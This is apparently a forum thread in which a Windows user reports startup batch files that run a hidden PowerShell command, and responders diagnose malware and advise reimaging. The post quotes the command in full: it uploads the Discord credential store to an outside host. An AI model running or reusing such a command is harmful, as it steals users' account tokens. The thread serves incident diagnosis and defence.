1

Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing:

powershell -windowstyle hidden -Command "& {&invoke-webrequest -method put -infile 'C:\Users\foo\AppData\Roaming\Discord\Local Storage\leveldb\000005.ldb' https://rip.rblx.dev/c/}"

The source of these commands are two batch files in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - LVTUSIX.bat and LVTUSIXd.bat. Both files were created this morning while I was away from my computer (about 30 min after turning it on). I'm unaware of a way to see who/what created the files - they are owned by the administrators group.

I can't find anything online about rip.rblx.dev or these batch files. A whois lookup on the domain reveals that all the info is privacy-protected.

I'm very suspicious as some research reveals that these .ldb files contain Discord user credentials.

Is anyone aware of what might be going on? Alternatively, does anyone have advice on how I might be able to find more info? I've since temporarily mangled the files to prevent them from running until I learn more. Thank you in advance.

Mike Boch
  • 11
  • 1
  • Sounds like you've been hacked. – Alexander O'Mara Apr 16 '19 at 00:16
  • Yes that's certainly my worry. I'm trying to gather more info to both A) confirm and B) figure out where it came from. – Mike Boch Apr 16 '19 at 00:18
  • The discord connection is for command&control to circumvent firewall issues. Turn the computer off and do not turn it on again until it has been re-imaged. – trognanders Apr 16 '19 at 01:02
  • Thank you all for the info. I've shut it off and will be completely wiping it + all connected drives tomorrow. This certainly sucks but oh well. I genuinely have no idea where this came from, but will be taking additional precautions to prevent it in the future. – Mike Boch Apr 16 '19 at 03:13
  • 1
    change your passwords in a clean computer as fast as possible. – Hugo Apr 16 '19 at 09:17

1 Answers1

3

Checking the domain and it's siblings on VirusTotal can be useful.

According to VirusTotal the parent rblx.dev domain points to an IP (91.195.240.94) which looks like a malware command & control server. So I'd say chances are high your PC has been compromised, and you might want to reimage it entirely (particularly as whoever dropped the scripts has elevated privileges already).

markeldo
  • 129
  • 4
  • Thank you! I'll be completely wiping it and starting over tomorrow. Unfortunately, I'm not sure I'll ever know where this came from. – Mike Boch Apr 16 '19 at 03:14